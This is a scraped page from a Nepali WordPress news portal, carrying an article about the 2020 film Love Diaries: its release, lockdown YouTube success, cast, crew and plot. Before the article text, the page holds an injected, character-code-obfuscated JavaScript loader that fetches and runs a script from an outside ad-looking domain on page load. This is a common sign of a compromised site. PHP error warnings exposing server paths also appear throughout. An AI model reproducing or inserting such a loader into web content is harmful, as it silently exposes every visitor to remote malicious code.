Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,101,110,100,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); Warning: session_start(): Cannot start session when headers already sent in /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/unyson/framework/includes/hooks.php on line 259
Warning: Cannot modify header information - headers already sent by (output started at /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/jetpack/sal/class.json-api-date.php:1) in /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/post-views-counter/includes/counter.php on line 294
Love Diaries | 2020 | Nepali Movie | Sushil Shrestha & Rubeena Thapa – Nepali News Portal – Trending Nepali News
नेपाली चलचित्र लभ डायरिज २०२० मा रिलिज भएको थियो। चलचित्रको प्रोमोसन र विज्ञापन निक्कै गरीए पनि यो चलचित्रले खासै राम्रो गर्न सकेन। त्यसमाथि अहिले यो कोरोनाको समयमा पनि पर्न गएको हुँदा यो चलचित्र सिनेमा घरहरुमा आफ्नो पकड जमाउन सकेन।
तर यो चलचित्र युट्युबमा एकदमै चाडो अपलोड भयो, चलचित्र कै प्रचार प्रसार राम्रो र लकडाउनको फाइदा दर्शकहरुले मज्जाले गरे। चलचित्र अपलोड भएको दुइ हप्ता बढि हुँदा र यो समाचार सम्पादन गर्दा सम्म यो चलचित्र ३७ लाख बढिले हेरिसकेका छन्।
यस चलचित्रमा सुशील श्रेष्ठ, रुबिना थापा र बिश्वोजित रिमालको मुख्य भूमिका रहेको छ। चलचित्रलाइ बिनोद सापकोटाले निर्माण गरेका हुन् भने सौरभ चौधरीले निर्देशन गरेका हुन्। चलचित्रमा सुशील र रुबिनाको पहिलो भेटमै झगडा हुन्छ। सुशीलको परिवार विदेशमा हुन्छन, तर उनको बुवाको सम्पति नेपालको पोखरामा हुन्छ, बुवाले छोरालाइ होटेल प्रारम्भ गर्न नेपाल पठाउछन्।
रुबिना भने इन्टेरियर डिजाइनर हुन्छिन र सुशील कै होटेलको डिजाइन गर्न काठमान्डू देखि पोखरा आउछिन। सुरुमा सुशील त्यो प्रपर्टिको मालिक थाहा हुँदैन र झगडा हुन्छ। मालिक भन्ने थाहा भए पनि सुशीलको एटिट्युड रुबिनालाइ मन पर्दैन र एक अर्का संग जति बेला पनि झगडा भइ रहन्छ। त्यसपछि यी दुइ जोडी कसरी मिल्छन त, त्यो तलको भिडियो हेरेर थाहा पाउनुहोस।
तपाइँहरुले यदि यो चलचित्र हेर्न छुटाउनु भएको छ भने तलको भिडियो हेर्नुहोस :-
Warning: session_start(): Cannot start session when headers already sent in /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/unyson/framework/helpers/class-fw-session.php on line 13
Warning: session_start(): Cannot start session when headers already sent in /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/unyson/framework/helpers/class-fw-session.php on line 13
Warning: session_start(): Cannot start session when headers already sent in /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/unyson/framework/helpers/class-fw-session.php on line 13